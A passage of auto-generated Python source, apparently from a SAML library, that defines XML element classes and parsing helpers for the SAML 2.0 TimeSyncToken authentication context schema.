c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Token'] = (
'token', Token)
c_child_order.extend(['token'])
def __init__(self,
token=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.token = token
def principal_authentication_mechanism_type__from_string(xml_string):
return saml2.create_class_from_xml_string(
PrincipalAuthenticationMechanismType_, xml_string)
class WrittenConsent(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:WrittenConsent element """
c_tag = 'WrittenConsent'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def written_consent_from_string(xml_string):
return saml2.create_class_from_xml_string(WrittenConsent, xml_string)
class SubscriberLineNumber(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SubscriberLineNumber element """
c_tag = 'SubscriberLineNumber'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def subscriber_line_number_from_string(xml_string):
return saml2.create_class_from_xml_string(SubscriberLineNumber, xml_string)
class UserSuffix(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:UserSuffix element """
c_tag = 'UserSuffix'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def user_suffix_from_string(xml_string):
return saml2.create_class_from_xml_string(UserSuffix, xml_string)
class Password(PasswordType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Password element """
c_tag = 'Password'
c_namespace = NAMESPACE
c_children = PasswordType_.c_children.copy()
c_attributes = PasswordType_.c_attributes.copy()
c_child_order = PasswordType_.c_child_order[:]
c_cardinality = PasswordType_.c_cardinality.copy()
def password_from_string(xml_string):
return saml2.create_class_from_xml_string(Password, xml_string)
class Smartcard(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Smartcard element """
c_tag = 'Smartcard'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def smartcard_from_string(xml_string):
return saml2.create_class_from_xml_string(Smartcard, xml_string)
class ActivationLimit(ActivationLimitType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ActivationLimit element """
c_tag = 'ActivationLimit'
c_namespace = NAMESPACE
c_children = ActivationLimitType_.c_children.copy()
c_attributes = ActivationLimitType_.c_attributes.copy()
c_child_order = ActivationLimitType_.c_child_order[:]
c_cardinality = ActivationLimitType_.c_cardinality.copy()
def activation_limit_from_string(xml_string):
return saml2.create_class_from_xml_string(ActivationLimit, xml_string)
class PrincipalAuthenticationMechanism(PrincipalAuthenticationMechanismType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PrincipalAuthenticationMechanism element """
c_tag = 'PrincipalAuthenticationMechanism'
c_namespace = NAMESPACE
c_children = PrincipalAuthenticationMechanismType_.c_children.copy()
c_attributes = PrincipalAuthenticationMechanismType_.c_attributes.copy()
c_child_order = PrincipalAuthenticationMechanismType_.c_child_order[:]
c_cardinality = PrincipalAuthenticationMechanismType_.c_cardinality.copy()
def principal_authentication_mechanism_from_string(xml_string):
return saml2.create_class_from_xml_string(PrincipalAuthenticationMechanism,
xml_string)
class PreviousSession(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PreviousSession element """
c_tag = 'PreviousSession'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def previous_session_from_string(xml_string):
return saml2.create_class_from_xml_string(PreviousSession, xml_string)
class ResumeSession(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ResumeSession element """
c_tag = 'ResumeSession'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def resume_session_from_string(xml_string):
return saml2.create_class_from_xml_string(ResumeSession, xml_string)
class ZeroKnowledge(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ZeroKnowledge element """
c_tag = 'ZeroKnowledge'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def zero_knowledge_from_string(xml_string):
return saml2.create_class_from_xml_string(ZeroKnowledge, xml_string)
class SharedSecretChallengeResponse(SharedSecretChallengeResponseType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SharedSecretChallengeResponse element """
c_tag = 'SharedSecretChallengeResponse'
c_namespace = NAMESPACE
c_children = SharedSecretChallengeResponseType_.c_children.copy()
c_attributes = SharedSecretChallengeResponseType_.c_attributes.copy()
c_child_order = SharedSecretChallengeResponseType_.c_child_order[:]
c_cardinality = SharedSecretChallengeResponseType_.c_cardinality.copy()
def shared_secret_challenge_response_from_string(xml_string):
return saml2.create_class_from_xml_string(SharedSecretChallengeResponse,
xml_string)
class DigSig(PublicKeyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:DigSig element """
c_tag = 'DigSig'
c_namespace = NAMESPACE
c_children = PublicKeyType_.c_children.copy()
c_attributes = PublicKeyType_.c_attributes.copy()
c_child_order = PublicKeyType_.c_child_order[:]
c_cardinality = PublicKeyType_.c_cardinality.copy()
def dig_sig_from_string(xml_string):
return saml2.create_class_from_xml_string(DigSig, xml_string)
class AsymmetricDecryption(PublicKeyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AsymmetricDecryption element """
c_tag = 'AsymmetricDecryption'
c_namespace = NAMESPACE
c_children = PublicKeyType_.c_children.copy()
c_attributes = PublicKeyType_.c_attributes.copy()
c_child_order = PublicKeyType_.c_child_order[:]
c_cardinality = PublicKeyType_.c_cardinality.copy()
def asymmetric_decryption_from_string(xml_string):
return saml2.create_class_from_xml_string(AsymmetricDecryption, xml_string)
class AsymmetricKeyAgreement(PublicKeyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AsymmetricKeyAgreement element """
c_tag = 'AsymmetricKeyAgreement'
c_namespace = NAMESPACE
c_children = PublicKeyType_.c_children.copy()
c_attributes = PublicKeyType_.c_attributes.copy()
c_child_order = PublicKeyType_.c_child_order[:]
c_cardinality = PublicKeyType_.c_cardinality.copy()
def asymmetric_key_agreement_from_string(xml_string):
return saml2.create_class_from_xml_string(AsymmetricKeyAgreement,
xml_string)
class IPAddress(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:IPAddress element """
c_tag = 'IPAddress'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def ip_address_from_string(xml_string):
return saml2.create_class_from_xml_string(IPAddress, xml_string)
class SharedSecretDynamicPlaintext(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SharedSecretDynamicPlaintext element """
c_tag = 'SharedSecretDynamicPlaintext'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def shared_secret_dynamic_plaintext_from_string(xml_string):
return saml2.create_class_from_xml_string(SharedSecretDynamicPlaintext,
xml_string)
class HTTP(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:HTTP element """
c_tag = 'HTTP'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def http_from_string(xml_string):
return saml2.create_class_from_xml_string(HTTP, xml_string)
class IPSec(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:IPSec element """
c_tag = 'IPSec'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def ip_sec_from_string(xml_string):
return saml2.create_class_from_xml_string(IPSec, xml_string)
class WTLS(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:WTLS element """
c_tag = 'WTLS'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def wtls_from_string(xml_string):
return saml2.create_class_from_xml_string(WTLS, xml_string)
class MobileNetworkNoEncryption(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:MobileNetworkNoEncryption element """
c_tag = 'MobileNetworkNoEncryption'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def mobile_network_no_encryption_from_string(xml_string):
return saml2.create_class_from_xml_string(MobileNetworkNoEncryption,
xml_string)
class MobileNetworkRadioEncryption(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:MobileNetworkRadioEncryption element """
c_tag = 'MobileNetworkRadioEncryption'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def mobile_network_radio_encryption_from_string(xml_string):
return saml2.create_class_from_xml_string(MobileNetworkRadioEncryption,
xml_string)
class MobileNetworkEndToEndEncryption(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:MobileNetworkEndToEndEncryption element """
c_tag = 'MobileNetworkEndToEndEncryption'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def mobile_network_end_to_end_encryption_from_string(xml_string):
return saml2.create_class_from_xml_string(MobileNetworkEndToEndEncryption,
xml_string)
class SSL(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SSL element """
c_tag = 'SSL'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def ssl_from_string(xml_string):
return saml2.create_class_from_xml_string(SSL, xml_string)
class PSTN(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PSTN element """
c_tag = 'PSTN'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def pstn_from_string(xml_string):
return saml2.create_class_from_xml_string(PSTN, xml_string)
class ISDN(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ISDN element """
c_tag = 'ISDN'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def isdn_from_string(xml_string):
return saml2.create_class_from_xml_string(ISDN, xml_string)
class ADSL(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ADSL element """
c_tag = 'ADSL'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def adsl_from_string(xml_string):
return saml2.create_class_from_xml_string(ADSL, xml_string)
class SwitchAudit(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SwitchAudit element """
c_tag = 'SwitchAudit'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def switch_audit_from_string(xml_string):
return saml2.create_class_from_xml_string(SwitchAudit, xml_string)
class DeactivationCallCenter(ExtensionOnlyType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:DeactivationCallCenter element """
c_tag = 'DeactivationCallCenter'
c_namespace = NAMESPACE
c_children = ExtensionOnlyType_.c_children.copy()
c_attributes = ExtensionOnlyType_.c_attributes.copy()
c_child_order = ExtensionOnlyType_.c_child_order[:]
c_cardinality = ExtensionOnlyType_.c_cardinality.copy()
def deactivation_call_center_from_string(xml_string):
return saml2.create_class_from_xml_string(DeactivationCallCenter,
xml_string)
class IdentificationType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:IdentificationType element """
c_tag = 'IdentificationType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}PhysicalVerification'] = (
'physical_verification', PhysicalVerification)
c_cardinality['physical_verification'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}WrittenConsent'] = (
'written_consent', WrittenConsent)
c_cardinality['written_consent'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}GoverningAgreements'] = (
'governing_agreements', GoverningAgreements)
c_cardinality['governing_agreements'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_attributes['nym'] = ('nym', NymType_, False)
c_child_order.extend(
['physical_verification', 'written_consent', 'governing_agreements',
'extension'])
def __init__(self,
physical_verification=None,
written_consent=None,
governing_agreements=None,
extension=None,
nym=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.physical_verification = physical_verification
self.written_consent = written_consent
self.governing_agreements = governing_agreements
self.extension = extension or []
self.nym = nym
def identification_type__from_string(xml_string):
return saml2.create_class_from_xml_string(IdentificationType_, xml_string)
class AuthenticatorTransportProtocolType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AuthenticatorTransportProtocolType element """
c_tag = 'AuthenticatorTransportProtocolType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}HTTP'] = (
'http', HTTP)
c_cardinality['http'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SSL'] = (
'ssl', SSL)
c_cardinality['ssl'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}MobileNetworkNoEncryption'] = (
'mobile_network_no_encryption', MobileNetworkNoEncryption)
c_cardinality['mobile_network_no_encryption'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}MobileNetworkRadioEncryption'] = (
'mobile_network_radio_encryption', MobileNetworkRadioEncryption)
c_cardinality['mobile_network_radio_encryption'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}MobileNetworkEndToEndEncryption'] = (
'mobile_network_end_to_end_encryption', MobileNetworkEndToEndEncryption)
c_cardinality['mobile_network_end_to_end_encryption'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}WTLS'] = (
'wtls', WTLS)
c_cardinality['wtls'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}IPSec'] = (
'ip_sec', IPSec)
c_cardinality['ip_sec'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}PSTN'] = (
'pstn', PSTN)
c_cardinality['pstn'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ISDN'] = (
'isdn', ISDN)
c_cardinality['isdn'] = {"min": 0, "max": 1}
c_children['{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ADSL'] = (
'adsl', ADSL)
c_cardinality['adsl'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_child_order.extend(['http', 'ssl', 'mobile_network_no_encryption',
'mobile_network_radio_encryption',
'mobile_network_end_to_end_encryption', 'wtls',
'ip_sec', 'pstn', 'isdn', 'adsl', 'extension'])
def __init__(self,
http=None,
ssl=None,
mobile_network_no_encryption=None,
mobile_network_radio_encryption=None,
mobile_network_end_to_end_encryption=None,
wtls=None,
ip_sec=None,
pstn=None,
isdn=None,
adsl=None,
extension=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.http = http
self.ssl = ssl
self.mobile_network_no_encryption = mobile_network_no_encryption
self.mobile_network_radio_encryption = mobile_network_radio_encryption
self.mobile_network_end_to_end_encryption = mobile_network_end_to_end_encryption
self.wtls = wtls
self.ip_sec = ip_sec
self.pstn = pstn
self.isdn = isdn
self.adsl = adsl
self.extension = extension or []
def authenticator_transport_protocol_type__from_string(xml_string):
return saml2.create_class_from_xml_string(
AuthenticatorTransportProtocolType_, xml_string)
class RestrictedPassword(RestrictedPasswordType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:RestrictedPassword element """
c_tag = 'RestrictedPassword'
c_namespace = NAMESPACE
c_children = RestrictedPasswordType_.c_children.copy()
c_attributes = RestrictedPasswordType_.c_attributes.copy()
c_child_order = RestrictedPasswordType_.c_child_order[:]
c_cardinality = RestrictedPasswordType_.c_cardinality.copy()
def restricted_password_from_string(xml_string):
return saml2.create_class_from_xml_string(RestrictedPassword, xml_string)
class ActivationPinType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ActivationPinType element """
c_tag = 'ActivationPinType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Length'] = (
'length', Length)
c_cardinality['length'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Alphabet'] = (
'alphabet', Alphabet)
c_cardinality['alphabet'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Generation'] = (
'generation', Generation)
c_cardinality['generation'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ActivationLimit'] = (
'activation_limit', ActivationLimit)
c_cardinality['activation_limit'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_child_order.extend(
['length', 'alphabet', 'generation', 'activation_limit', 'extension'])
def __init__(self,
length=None,
alphabet=None,
generation=None,
activation_limit=None,
extension=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.length = length
self.alphabet = alphabet
self.generation = generation
self.activation_limit = activation_limit
self.extension = extension or []
def activation_pin_type__from_string(xml_string):
return saml2.create_class_from_xml_string(ActivationPinType_, xml_string)
class SecurityAuditType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SecurityAuditType element """
c_tag = 'SecurityAuditType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SwitchAudit'] = (
'switch_audit', SwitchAudit)
c_cardinality['switch_audit'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_child_order.extend(['switch_audit', 'extension'])
def __init__(self,
switch_audit=None,
extension=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.switch_audit = switch_audit
self.extension = extension or []
def security_audit_type__from_string(xml_string):
return saml2.create_class_from_xml_string(SecurityAuditType_, xml_string)
class Identification(IdentificationType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:Identification element """
c_tag = 'Identification'
c_namespace = NAMESPACE
c_children = IdentificationType_.c_children.copy()
c_attributes = IdentificationType_.c_attributes.copy()
c_child_order = IdentificationType_.c_child_order[:]
c_cardinality = IdentificationType_.c_cardinality.copy()
def identification_from_string(xml_string):
return saml2.create_class_from_xml_string(Identification, xml_string)
class ActivationPin(ActivationPinType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:ActivationPin element """
c_tag = 'ActivationPin'
c_namespace = NAMESPACE
c_children = ActivationPinType_.c_children.copy()
c_attributes = ActivationPinType_.c_attributes.copy()
c_child_order = ActivationPinType_.c_child_order[:]
c_cardinality = ActivationPinType_.c_cardinality.copy()
def activation_pin_from_string(xml_string):
return saml2.create_class_from_xml_string(ActivationPin, xml_string)
class AuthenticatorTransportProtocol(AuthenticatorTransportProtocolType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:AuthenticatorTransportProtocol element """
c_tag = 'AuthenticatorTransportProtocol'
c_namespace = NAMESPACE
c_children = AuthenticatorTransportProtocolType_.c_children.copy()
c_attributes = AuthenticatorTransportProtocolType_.c_attributes.copy()
c_child_order = AuthenticatorTransportProtocolType_.c_child_order[:]
c_cardinality = AuthenticatorTransportProtocolType_.c_cardinality.copy()
def authenticator_transport_protocol_from_string(xml_string):
return saml2.create_class_from_xml_string(AuthenticatorTransportProtocol,
xml_string)
class SecurityAudit(SecurityAuditType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:SecurityAudit element """
c_tag = 'SecurityAudit'
c_namespace = NAMESPACE
c_children = SecurityAuditType_.c_children.copy()
c_attributes = SecurityAuditType_.c_attributes.copy()
c_child_order = SecurityAuditType_.c_child_order[:]
c_cardinality = SecurityAuditType_.c_cardinality.copy()
def security_audit_from_string(xml_string):
return saml2.create_class_from_xml_string(SecurityAudit, xml_string)
class OperationalProtectionType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:OperationalProtectionType element """
c_tag = 'OperationalProtectionType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}SecurityAudit'] = (
'security_audit', SecurityAudit)
c_cardinality['security_audit'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}DeactivationCallCenter'] = (
'deactivation_call_center', DeactivationCallCenter)
c_cardinality['deactivation_call_center'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_child_order.extend(
['security_audit', 'deactivation_call_center', 'extension'])
def __init__(self,
security_audit=None,
deactivation_call_center=None,
extension=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.security_audit = security_audit
self.deactivation_call_center = deactivation_call_center
self.extension = extension or []
def operational_protection_type__from_string(xml_string):
return saml2.create_class_from_xml_string(OperationalProtectionType_,
xml_string)
class KeyActivationType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:KeyActivationType element """
c_tag = 'KeyActivationType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}ActivationPin'] = (
'activation_pin', ActivationPin)
c_cardinality['activation_pin'] = {"min": 0, "max": 1}
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}Extension'] = (
'extension', [Extension])
c_cardinality['extension'] = {"min": 0}
c_child_order.extend(['activation_pin', 'extension'])
def __init__(self,
activation_pin=None,
extension=None,
text=None,
extension_elements=None,
extension_attributes=None,
):
SamlBase.__init__(self,
text=text,
extension_elements=extension_elements,
extension_attributes=extension_attributes,
)
self.activation_pin = activation_pin
self.extension = extension or []
def key_activation_type__from_string(xml_string):
return saml2.create_class_from_xml_string(KeyActivationType_, xml_string)
class KeyActivation(KeyActivationType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:KeyActivation element """
c_tag = 'KeyActivation'
c_namespace = NAMESPACE
c_children = KeyActivationType_.c_children.copy()
c_attributes = KeyActivationType_.c_attributes.copy()
c_child_order = KeyActivationType_.c_child_order[:]
c_cardinality = KeyActivationType_.c_cardinality.copy()
def key_activation_from_string(xml_string):
return saml2.create_class_from_xml_string(KeyActivation, xml_string)
class OperationalProtection(OperationalProtectionType_):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:OperationalProtection element """
c_tag = 'OperationalProtection'
c_namespace = NAMESPACE
c_children = OperationalProtectionType_.c_children.copy()
c_attributes = OperationalProtectionType_.c_attributes.copy()
c_child_order = OperationalProtectionType_.c_child_order[:]
c_cardinality = OperationalProtectionType_.c_cardinality.copy()
def operational_protection_from_string(xml_string):
return saml2.create_class_from_xml_string(OperationalProtection, xml_string)
class PrivateKeyProtectionType_(SamlBase):
"""The urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken:PrivateKeyProtectionType element """
c_tag = 'PrivateKeyProtectionType'
c_namespace = NAMESPACE
c_children = SamlBase.c_children.copy()
c_attributes = SamlBase.c_attributes.copy()
c_child_order = SamlBase.c_child_order[:]
c_cardinality = SamlBase.c_cardinality.copy()
c_children[
'{urn:oasis:names:tc:SAML:2.0:ac:classes:TimeSyncToken}KeyActivation'] = (
'key_activation', KeyActivation)
c_cardinality['key_activation'] = {"min": 0, "max": 1}
c_children[
